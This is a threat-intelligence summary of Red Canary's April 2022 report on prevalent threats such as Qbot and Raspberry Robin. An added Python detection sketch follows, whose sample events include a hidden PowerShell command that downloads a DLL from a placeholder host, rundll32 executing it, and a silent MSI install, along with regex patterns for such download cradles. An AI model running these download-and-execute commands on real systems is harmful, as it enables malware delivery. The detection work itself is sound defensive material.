2022-05-31

Red Canary Intelligence Insights

Industry: N/A | Level: Tactical | Source: Red Canary

Red Canary's monthly Intelligence Insights report states that the most prevalent threats for April 2022 were Impacket and Mimikatz, which retained the top two positions as the most observed threats. Notable rises in activity came from Gootloader, Qbot, SocGholish, and Raspberry Robin. Raspberry Robin, analyzed by Red Canary, is a "Worm spread by external drives that leverages Windows Installer to download a malicious DLL." New infection vectors for Qbot have been observed using LNK files and MSI packages. The LNK chain begins with delivery inside a compressed zip file; when the victim executes the LNK file, it runs a PowerShell command that downloads and executes the Qbot DLL. MSI packages were observed being delivered to victims in place of Microsoft Office macros. Activity following Qbot delivery has included reconnaissance with BloodHound and execution of Cobalt Strike.

Anvilogic Scenario:

  • Qakbot/Qbot Zip/LNK/MSI File Delivery to Recon or CS Activity

Anvilogic Use Cases:

  • Compressed File Execution
  • Symbolic OR Hard File Link Created
  • MSIExec Install MSI File
  • Invoke-WebRequest Command
  • Rundll32 Command Line
  • SharpHound Enumeration
  • Cobalt Strike Beacon
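As an added example that is not part of the original report or of Anvilogic's own use cases, the following Python sketch turns the LNK chain described above (explorer.exe spawning PowerShell that downloads a DLL, then rundll32 executing it) and the MSI-package variant into detection logic run over constructed process-creation events. The event tuples, URL and paths are all constructed for illustration, and the stage labels are assumed names.

```python
import re

# Constructed sample process-creation events (not real telemetry), modelled on
# the chain described above: (parent_image, image, command_line).
SAMPLE_EVENTS = [
    # zip -> LNK opened in Explorer -> PowerShell fetches the Qbot DLL
    ("explorer.exe", "powershell.exe",
     "powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/q.png "
     "-OutFile C:\\Users\\Public\\q.dll"),
    # the downloaded DLL is executed with rundll32
    ("powershell.exe", "rundll32.exe",
     "rundll32.exe C:\\Users\\Public\\q.dll,DllRegisterServer"),
    # MSI-package variant delivered in place of an Office macro
    ("explorer.exe", "msiexec.exe",
     "msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\Invoice.msi /qn"),
    # benign noise that must not fire
    ("explorer.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("services.exe", "msiexec.exe", "msiexec.exe /V"),
]

DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring", re.I)
RUNDLL_RE = re.compile(r"rundll32(\.exe)?\s+.*\.dll", re.I)
MSI_RE = re.compile(r"msiexec(\.exe)?\s+.*(/i|/package)\s+.*\.msi", re.I)
# user-writable locations where dropped payloads usually land
USER_PATH_RE = re.compile(r"\\(users\\public|appdata\\local\\temp|downloads)\\", re.I)

def classify_event(parent, image, cmdline):
    """Label one event with the chain stage it matches, or return None."""
    img, par = image.lower(), parent.lower()
    if img == "powershell.exe" and DOWNLOAD_RE.search(cmdline):
        # an LNK opened by the user is spawned by explorer.exe
        return "download_from_explorer" if par == "explorer.exe" else "download"
    if img == "rundll32.exe" and RUNDLL_RE.search(cmdline) and USER_PATH_RE.search(cmdline):
        return "rundll32_user_path_dll"
    if img == "msiexec.exe" and MSI_RE.search(cmdline) and USER_PATH_RE.search(cmdline):
        return "msiexec_user_path_msi"
    return None

def detect_qbot_delivery(events):
    """Return (stage_labels, chain_verdicts); a verdict needs the stages to line up."""
    stages = [s for s in (classify_event(*e) for e in events) if s]
    verdicts = []
    # LNK chain: a PowerShell download followed by rundll32 loading a DLL from a user path
    if any(s.startswith("download") for s in stages) and "rundll32_user_path_dll" in stages:
        verdicts.append("qbot_lnk_powershell_rundll32_chain")
    if "msiexec_user_path_msi" in stages:
        verdicts.append("qbot_msi_package_delivery")
    return stages, verdicts
```

In production the same stages would be correlated per host and within a short time window rather than over a flat batch, and the path list tuned to the environment.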
